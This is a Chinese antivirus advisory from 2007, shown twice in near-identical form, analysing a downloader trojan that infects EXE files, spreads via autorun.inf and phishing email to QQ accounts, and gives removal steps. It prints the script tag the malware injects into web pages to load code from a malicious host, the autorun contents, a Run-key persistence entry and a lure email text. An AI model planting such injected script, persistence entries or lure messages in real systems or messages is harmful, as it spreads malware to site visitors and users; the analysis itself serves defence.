档案编号:CISRT2007041
病毒名称:Trojan-Downloader.Win32.Agent.bky(Kaspersky)
病毒别名:Worm.DlOnlineGames.a(瑞星)
Win32.MyInfect.af.16384(毒霸)
病毒大小:13,824 字节
13,312 字节
加壳方式:
样本MD5:1d9ad0c63ff4b43c28052db0f0cd23ae
e9100ce97a5b4fbd8857b25ffe2d7179
样本SHA1:8da40bc9d27e5d3707b0cc9710b5528c1b8e7404
a0a32e4bea2c3b366c0e0433f17ef9c9f9b41104
发现时间:2007.3
更新时间:2007.3.30
关联病毒:
传播方式:通过恶意网站传播,利用ani漏洞,感染exe可执行文件,修改htm等网页文件,发送邮件
技术分析
==========
病毒运行后复制自身到系统目录:
%System%\sysload3.exe
创建自启动项:
调用IE进程(iexplore.exe)访问网络下载病毒配置信息,保存为%System%\config.ini,开启记事本(notepad.exe)进程开始感一系列病毒动作。
感染系统分区以外的.EXE文件,感染过程中会产生临时文件%System%\tempIcon.exe和%System%\tempload.exe,%System%\tempIcon.exe是病毒副本+被感染exe文件图标,添加到被感染exe文件前端;被感染exe文件尾部也增加8字节。
修改网页文件,
在这些文件的<body>代码后添加指向恶意地址的代码:
尝试向A驱动器复制病毒副本:
A:\tool.exe
A:\autorun.inf
autorun.inf内容:
尝试向QQ信箱发送邮件,QQ号码随机产生,正文里附带含有利用ani漏洞的恶意网页地址。
修改hosts文件,屏蔽一些域名,其中也包括其它同类病毒的下载域名。
病毒内文字信息:
Mutex:MyInfect
清除步骤
==========
1. 结束notepad.exe进程和iexplore.exe进程
2. 删除病毒自启动项:
3. 删除文件:
%System%\sysload3.exe
%System%\config.ini
4. 使用反病毒软件进行全盘扫描,清除被感染的exe和网页文件
发布时间:2007-04-02 10:11
更新时间:2007-04-03 20:30
病毒名称:Trojan-Downloader.Win32.Agent.bky(Kaspersky)
病毒别名:Worm.DlOnlineGames.a(瑞星)
Win32.MyInfect.af.16384(毒霸)
病毒大小:13,824 字节
13,312 字节
加壳方式:
样本MD5:1d9ad0c63ff4b43c28052db0f0cd23ae
e9100ce97a5b4fbd8857b25ffe2d7179
样本SHA1:8da40bc9d27e5d3707b0cc9710b5528c1b8e7404
a0a32e4bea2c3b366c0e0433f17ef9c9f9b41104
发现时间:2007.3
更新时间:2007.3.30
关联病毒:
传播方式:通过恶意网站传播,利用ani漏洞,感染exe可执行文件,修改htm等网页文件,发送邮件
技术分析
==========
病毒运行后复制自身到系统目录:
%System%\sysload3.exe
创建自启动项:
| [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "System Boot Check"="%System%\sysload3.exe" |
调用IE进程(iexplore.exe)访问网络下载病毒配置信息,保存为%System%\config.ini,开启记事本(notepad.exe)进程开始感一系列病毒动作。
感染系统分区以外的.EXE文件,感染过程中会产生临时文件%System%\tempIcon.exe和%System%\tempload.exe,%System%\tempIcon.exe是病毒副本+被感染exe文件图标,添加到被感染exe文件前端;被感染exe文件尾部也增加8字节。
修改网页文件,
| .HTM .HTML .ASP .ASPX .PHP .JSP |
在这些文件的<body>代码后添加指向恶意地址的代码:
| <script src=http://macr.microfsot.com/Noindex.js></script> |
尝试向A驱动器复制病毒副本:
A:\tool.exe
A:\autorun.inf
autorun.inf内容:
| [autorun] Open=tool.exe Shellexecute=tool.exe Shell\0\command = tool.exe Shell\0= 打开 |
尝试向QQ信箱发送邮件,QQ号码随机产生,正文里附带含有利用ani漏洞的恶意网页地址。
| 发件人:i_love_cq@sohu.com 收件人:[随机数字]@qq.com 主题:你和谁视频的时候被拍下的?给你笑死了! 正文: 看你那小样!我看你是出名了! 你看这个地址!你的脸拍的那么清楚!你变明星了! http://macr.microfsot.com/20070326/134952.htm |
修改hosts文件,屏蔽一些域名,其中也包括其它同类病毒的下载域名。
病毒内文字信息:
| OK BMW xV4 |
| I will by one BMW this year! xV4 |
Mutex:MyInfect
清除步骤
==========
1. 结束notepad.exe进程和iexplore.exe进程
2. 删除病毒自启动项:
| HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "System Boot Check"="%System%\sysload3.exe" |
3. 删除文件:
%System%\sysload3.exe
%System%\config.ini
4. 使用反病毒软件进行全盘扫描,清除被感染的exe和网页文件
发布时间:2007-04-02 10:11
更新时间:2007-04-03 20:30